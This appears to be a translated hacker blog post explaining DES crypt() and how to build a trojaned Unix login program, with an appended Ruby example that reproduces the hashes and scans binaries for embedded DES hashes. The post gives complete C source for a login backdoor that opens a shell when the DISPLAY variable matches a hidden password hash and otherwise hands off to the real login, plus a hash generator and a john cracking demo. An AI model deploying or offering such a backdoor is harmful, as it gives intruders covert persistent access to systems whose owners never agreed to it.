Once you are on a host, you often find that the system's login program has already been replaced by someone who got there first. On machines in China the password part can usually be read straight out of the binary with the strings command, while foreign intruders tend to take an extra step, most commonly running the password through DES crypt(). This post gives a short introduction to the crypt() function and an example of using it in a login backdoor.
First, look at the following program:
-----------------snip---------------------------------
/*
 generate crypted passwd using DES
 compile: gcc -o gen gen.c -lcrypt
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <crypt.h>

int main(int argc, char *argv[])
{
    if (argc != 3)
    {
        /* two arguments: the password to hash and the salt */
        printf("usage: %s <password> <salt>\n", argv[0]);
        exit(1);
    }
    /* crypt(3) reads only the first two characters of the salt;
       they become the first two characters of the 13-character hash */
    printf("%s\n", crypt(argv[1], argv[2]));
    return 0;
}
-----------------snip---------------------------------
This program generates a shadow-style password hash. It takes two arguments: the password to hash and the salt. crypt() uses only the first two characters of the salt, and those two characters become the first two characters of the hash, so the salt is always visible in the output. The output is the value to #define as the password in login.c. For example, if the password is hack, ./gen hack Ui produces UiVqMWvDrIQjA, which goes into login.c like this:
#define PASSWORD "UiVqMWvDrIQjA"
Below is the modified login.c.
-----------------snip---------------------------------
/*
 login backdoor
 compile: gcc -o ulogin login.c -lcrypt
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <crypt.h>

/*
 the value of PASSWORD is obtained with gen.c above
*/
#define PASSWORD "UiVqMWvDrIQjA"
#define SHELL "/bin/csh"
#define LOGIN_BAK "/sbin/login"   /* the real login, moved aside */

int main(int argc, char **argv, char **envp)
{
    char *display = getenv("DISPLAY");

    /* no DISPLAY in the environment: behave exactly like the real login */
    if (display == NULL) {
        execve(LOGIN_BAK, argv, envp);
        perror(LOGIN_BAK);
        exit(1);
    }
    /* the stored hash doubles as the salt, because crypt(3) only reads
       its first two characters; a match means DISPLAY held the password */
    if (!strcmp(PASSWORD, crypt(display, PASSWORD))) {
        system(SHELL);
        exit(1);
    }
    /* wrong DISPLAY: fall through to the real login */
    execve(LOGIN_BAK, argv, envp);
    perror(LOGIN_BAK);
    exit(1);
}
-----------------snip---------------------------------
Can the password be cracked with john? Suppose you generate the hash like this:
$ ./gen hack hack
harGxySYgF3gs
The salt is the first two characters of the hash, so it is never secret; if it was taken from the password itself, the hash hands an attacker the first two characters of the password. The attacker can then treat the salt value ha as if it were the username of an /etc/passwd entry and let john work from it:
$ cat>t
h:harGxySYgF3gs
$ date;./john t;date
Wed 10 18 18:07:47 EDT 2000
Loaded 1 password (Standard DES [48/64 4K])
hack             (h)
guesses: 1  time: 0:00:01:08 (3)  c/s: 45319  trying: h141 - hurf
Wed 10 18 18:08:55 EDT 2000
$
As you can see, even with just h as the username the password fell in about a minute. So first, the password must be strong (and note that traditional DES crypt only uses its first 8 characters, so a longer passphrase adds nothing); second, when generating the hash with gen.c, never use the password itself as the salt.
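The points above, worked through in code. This is an added example and is not part of the original post; it is in Ruby rather than C because Ruby's String#crypt calls the same platform crypt(3) that gen.c and login.c use, so the hashes on this page can be checked without compiling anything. It reproduces the gen.c call and the login.c check, shows the salt sitting in the clear and the 8-character limit of traditional DES crypt, and adds a strings-style scan for embedded DES hashes. The scan, the random_salt helper and the sample bytes are assumptions of this example, not anything from the page.

```ruby
# Added example, not code from the original post: exercise the platform
# crypt(3) through Ruby's String#crypt to reproduce the page's hashes and
# show what a 13-character DES hash leaks, what it truncates, and how the
# stored hash doubles as the salt in the login.c check.

CRYPT_ALPHABET = [*('a'..'z'), *('A'..'Z'), *('0'..'9'), '.', '/'].freeze

# Same call as gen.c: crypt(password, salt). Only the first two salt
# characters are used, and they become the first two hash characters.
def gen(password, salt)
  password.crypt(salt)
end

# Two salt characters drawn from the crypt alphabet, never from the
# password (assumed helper; gen.c takes the salt from the command line).
def random_salt
  Array.new(2) { CRYPT_ALPHABET.sample }.join
end

# Same check as login.c: crypt(display, PASSWORD) == PASSWORD. Passing the
# stored hash as the salt works because crypt(3) reads only its first two bytes.
def backdoor_accepts?(stored_hash, candidate)
  candidate.crypt(stored_hash) == stored_hash
end

# The salt is in the clear, so if it was copied from the password it gives
# away the first two password characters (the page's "hack" / "ha" case).
def salt_of(hash)
  hash[0, 2]
end

# Traditional DES crypt uses at most 8 password characters; anything after
# them is ignored, so "strong" here means 8 good characters, not a passphrase.
def truncated_to_same_hash?(long_password, salt)
  long_password.length > 8 && gen(long_password, salt) == gen(long_password[0, 8], salt)
end

# Defender-side triage matching the page's strings(1) remark: pull printable
# runs out of a binary and keep 13-character tokens made only of crypt
# alphabet characters. Any other 13-character identifier matches too, so
# treat hits as candidates to verify, not as proof of a backdoor.
def des_hash_candidates(bytes)
  bytes.b.scan(/[\x20-\x7e]{4,}/)
       .flat_map { |run| run.scan(%r{(?<![A-Za-z0-9./])[A-Za-z0-9./]{13}(?![A-Za-z0-9./])}) }
       .uniq
end

if __FILE__ == $PROGRAM_NAME
  puts gen('hack', 'Ui')          # the page's UiVqMWvDrIQjA
  puts gen('hack', 'hack')        # the page's harGxySYgF3gs; salt "ha" is visible
  puts gen('hack', random_salt)   # a different hash on every run
  # Constructed stand-in for a trojaned login binary, not a real sample.
  sample = "\x7fELF\x00\x01login backdoor\x00UiVqMWvDrIQjA\x00/bin/csh\x00/sbin/login\x00"
  p des_hash_candidates(sample)   # ["UiVqMWvDrIQjA"]
end
```

Run it with ruby on a system whose crypt(3) still supports traditional DES; some recent distributions build libcrypt without the DES hash, in which case String#crypt returns a failure marker instead of a 13-character hash.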
SHELL and LOGIN_BAK could be obscured the same way. But a login backdoor is so easy to spot that there is little point in going any further with it.
The above is just idle chatter; if anything in it is wrong, please write and let me know. :)